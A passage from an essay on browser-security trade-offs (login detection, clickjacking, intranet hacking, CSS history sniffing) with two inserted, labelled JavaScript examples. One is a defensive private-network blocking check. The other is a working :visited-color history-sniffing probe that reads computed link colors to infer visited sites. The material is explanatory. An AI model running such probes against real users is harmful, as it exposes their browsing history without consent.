are only too happy to comply. Their choice is simple: be less secure and more user-adopted, or be secure and obscure. This is the Web security trade-off: a choice made by those who do not fully understand or appreciate, and are not liable for, the risks they are imposing on everyone using the Web.
Nonstarter solutions
To fix login detection, a browser might decide not to send the Web visitor's cookie data to off-domain destinations (those different from the hostname in the URL bar) along with the Web requests. Cookies are essential to tracking login state. The off-domain destination would still receive the request, but it would not know to whom the request belonged, which is exactly what stops the attack.
Not sending cookies off-domain, however, would break functionality for any website that uses multiple hostnames to deliver authenticated content. It would break single-click Web widgets such as Twitter's "Follow," Facebook's "Like," and Google's "+1" buttons, forcing the user to perform a second step. It would also break visitor tracking via Google Analytics, Coremetrics, and so on. From the perspective of many, this is a clear nonstarter.
To fix clickjacking, Web browsers could ban iframes entirely, or at least ban transparent iframes. Ideally, browser users should be able to "see" what they are really clicking on. Suggesting such a change to iframes, however, is a losing battle: millions of websites rely upon them, including transparent iframes, for essential functionality, Facebook, Gmail, and Yahoo! Mail among them. You do not normally see iframes when they are used, but they are indeed everywhere, and that level of breakage is never going to be tolerated.
For browser intranet hacking, Web browsers could prohibit the inclusion of RFC-1918 resources (addresses in 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16) from non-RFC-1918 websites. This essentially creates a break point in the browser between public and private networks. One reason browser vendors say this is not doable is that some organizations actually do legitimately include intranet content on public websites. Therefore, because some organizations (whom you have never heard of and whose websites you will never visit) have an odd use case, your browser leaves the private networks you are on, and those of hundreds of millions of others, wide open.
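The public-to-private "break point" described above, as an added example that is not code from the article: a subresource request is refused when the embedding page's origin resolved to a public IPv4 address but the resource resolved to an RFC 1918 address. It assumes hostnames have already been resolved to IPv4 literals (a real browser would apply the rule at resolution time) and leaves IPv6 and other special-purpose ranges such as loopback out of scope; the function and constant names are the example's own.

```javascript
// Added example, not from the article. Models the rule "no RFC 1918 resources
// embedded from non-RFC 1918 pages" that a browser could enforce.

// Parse a dotted-quad IPv4 literal into a 32-bit unsigned integer, or return
// null when the string is not a valid address. Leading zeros are rejected so
// that forms like "010.0.0.1" cannot dodge the check as octal-looking aliases.
function parseIPv4(s) {
  const parts = s.split('.');
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^(0|[1-9][0-9]{0,2})$/.test(p)) return null;
    const v = Number(p);
    if (v > 255) return null;
    n = n * 256 + v;
  }
  return n;
}

// The three private-use blocks defined by RFC 1918, as [network, prefix length].
const RFC1918_BLOCKS = [
  ['10.0.0.0', 8],
  ['172.16.0.0', 12],
  ['192.168.0.0', 16],
];

// True when addr (32-bit unsigned) lies inside network/prefix.
function inCidr(addr, network, prefix) {
  const mask = prefix === 0 ? 0 : (0xffffffff << (32 - prefix)) >>> 0;
  return ((addr & mask) >>> 0) === ((network & mask) >>> 0);
}

// True only for a syntactically valid IPv4 literal inside an RFC 1918 block.
// Unparseable input is treated as "not private" rather than guessed at.
function isRfc1918(ip) {
  const addr = parseIPv4(ip);
  if (addr === null) return false;
  return RFC1918_BLOCKS.some(([net, len]) => inCidr(addr, parseIPv4(net), len));
}

// Policy from the text: a public page pulling in a private-network resource is
// the "browser intranet hacking" case and is blocked. Private-to-private (an
// intranet portal loading an intranet widget) and any request for a public
// resource are allowed, which is what keeps ordinary sites working.
function shouldBlockSubresource(pageIp, resourceIp) {
  return !isRfc1918(pageIp) && isRfc1918(resourceIp);
}
```

The interesting edge is the 172.16.0.0/12 block: 172.31.255.255 is private but 172.32.0.1 is not, which a naive "starts with 172.16" string check gets wrong, and which is why the example masks on the full prefix.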
As shocking as this sounds, try looking at the decision not to fix the problem from the browser vendors' perspective. If they break the uncommon use case of these unnamed organizations, the people within those organizations are forced to switch to a competing "less-secure" browser that allows them to continue business as usual. The security of all other users of the browser that makes the change increases, but that browser vendor loses some fraction of market share.
Security Chasm
The browser vendors' unwillingness to risk market share has led to the current security chasm. Dramatic improvements in browser security and online privacy are held hostage by backward compatibility requirements related to how the Internet was designed. Web-browser vendors compete with each other in trench-style warfare, gaining ground by scratching for a tiny percentage of new users every day, users who do not pay them a dime, while simultaneously trying to keep every last user they already have.
It is important to remember that mainstream browsers are essentially advertising platforms. The more eyeballs browsers have, the more ads are delivered. Ads, and ad clicks, are what pay for the whole party. Anything getting in the way of that is never a priority.
To be fair, there was one important win recently when, after years of discussion, a fix was applied to CSS history sniffing. This is the ability of a website to uncover the history of other websites a user had visited by creating hyperlinks on a Web page and using either JavaScript or CSS to check the color the browser applied to each link. A blue link meant the visitor had not been there; purple indicated the user had visited the site. This was a serious privacy flaw that was simple, effective, and 10,000-URLs-per-second fast to execute. Any website could quickly learn where you banked, where you shopped, what news you read, which adult websites you frequented, and so on.
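The sniffing probe described above, as an added example that is not code from the article, with the color lookup injected so the same attack logic can be exercised against two browser behaviors: one that reports the real :visited color, and one that, like browsers after the fix, answers with the unvisited color for every link a script asks about. The `makeDomColorOf` helper is the browser-side lookup and needs a DOM; the candidate URLs, the visitor history, and the two colors are constructed stand-ins for the offline run.

```javascript
// Added example, not from the article. Demonstrates the :visited color probe
// and why the later browser fix (lying to scripts about :visited styles)
// defeats it.

const UNVISITED = 'rgb(0, 0, 255)';   // the "blue link"
const VISITED = 'rgb(128, 0, 128)';   // the "purple link"

// Core of the attack: for each candidate URL, build a link to it and ask the
// rendering engine what color it drew. Purple means the URL is in the history.
function sniffHistory(candidateUrls, colorOf) {
  const visited = [];
  for (const url of candidateUrls) {
    if (colorOf(url) === VISITED) visited.push(url);
  }
  return visited;
}

// Browser-side color lookup (needs a DOM; not run offline). Injects the
// :link/:visited rules, keeps the probe links off-screen rather than
// display:none so that style resolution is not skipped, and reads the
// computed color back. On a fixed browser every answer is UNVISITED.
function makeDomColorOf(document, window) {
  const style = document.createElement('style');
  style.textContent =
    `.probe a:link { color: ${UNVISITED}; } .probe a:visited { color: ${VISITED}; }`;
  document.head.appendChild(style);
  const box = document.createElement('div');
  box.className = 'probe';
  box.style.position = 'absolute';
  box.style.left = '-10000px';
  document.body.appendChild(box);
  return function colorOf(url) {
    const a = document.createElement('a');
    a.href = url;
    box.appendChild(a);
    const color = window.getComputedStyle(a).color;
    box.removeChild(a);
    return color;
  };
}

// Constructed offline stand-ins for the two browser generations. The leaky
// browser reports the true :visited color; the fixed browser always reports
// the unvisited color to script, so the probe learns nothing.
const CONSTRUCTED_HISTORY = new Set(['https://bank.example/', 'https://news.example/']);
const leakyColorOf = (url) => (CONSTRUCTED_HISTORY.has(url) ? VISITED : UNVISITED);
const fixedColorOf = () => UNVISITED;

// Constructed candidate list; a real attacker would feed tens of thousands.
const CANDIDATES = ['https://bank.example/', 'https://shop.example/', 'https://news.example/'];

function demo() {
  return {
    leaky: sniffHistory(CANDIDATES, leakyColorOf),
    fixed: sniffHistory(CANDIDATES, fixedColorOf),
  };
}
```

In a browser, `sniffHistory(CANDIDATES, makeDomColorOf(document, window))` is the whole attack; the throughput the text quotes comes from the fact that each probe is one element creation and one style read, with no network round trip.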